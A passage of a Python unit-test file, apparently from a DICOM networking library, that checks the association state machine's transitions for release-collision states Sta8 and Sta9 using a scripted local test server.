self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt10']
def test_evt11(self):
"""Test Sta8 + Evt11."""
# Sta8 + Evt11 -> <ignore> -> Sta8
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt11']
def test_evt12(self):
"""Test Sta8 + Evt12."""
# Sta8 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # get a_assoc_rq
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt12']
def test_evt13(self):
"""Test Sta8 + Evt13."""
# Sta8 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_release_rp),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt13']
def test_evt14(self):
"""Test Sta8 + Evt14."""
# Sta8 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Send A-RELEASE-RP PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt14']
def test_evt15(self):
"""Test Sta8 + Evt15."""
# Sta8 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt15']
def test_evt16(self):
"""Test Sta8 + Evt16."""
# Sta8 + Evt16 -> AA-3 -> Sta13
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_abort),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt16']
def test_evt17(self):
"""Test Sta8 + Evt17."""
# Sta8 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt17']
def test_evt18(self):
"""Test Sta8 + Evt18."""
# Sta8 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt18']
def test_evt19(self):
"""Test Sta8 + Evt19."""
# Sta8 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', b'\x08\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt19']
class TestState09(TestStateBase):
"""Tests for State 09: Release collision req - awaiting A-RELEASE (rp)."""
def test_evt01(self):
"""Test Sta9 + Evt1."""
# Sta9 + Evt1 -> <ignore> -> Sta9
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1), # no response
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta9 + Evt2."""
# Sta9 + Evt2 -> <ignore> -> Sta9
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta9 + Evt3."""
# Sta9 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta9 + Evt4."""
# Sta9 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('send', a_associate_rj),
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta9 + Evt5."""
# Sta9 + Evt5 -> <ignore> -> Sta9
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta9 + Evt6."""
# Sta9 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta9 + Evt7."""
# Sta9 + Evt7 -> <ignore> -> Sta9
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta9 + Evt8."""
# Sta9 + Evt8 -> <ignore> -> Sta9
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta9 + Evt9."""
# Sta9 + Evt9 -> <ignore> -> Sta9
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta9 + Evt10."""
# Sta9 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta9 + Evt11."""
# Sta9 + Evt11 -> <ignore> -> Sta9
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta9 + Evt12."""
# Sta9 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta9 + Evt13."""
# Sta9 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta9 + Evt14."""
# Sta9 + Evt14 -> AR-9 -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-9: Send A-RELEASE-RP PDU to <remote>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('recv', None), # recv a-release-rp
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14'
]
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta9 + Evt15."""
# Sta9 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta9 + Evt16."""
# Sta9 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta9 + Evt17."""
# Sta9 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
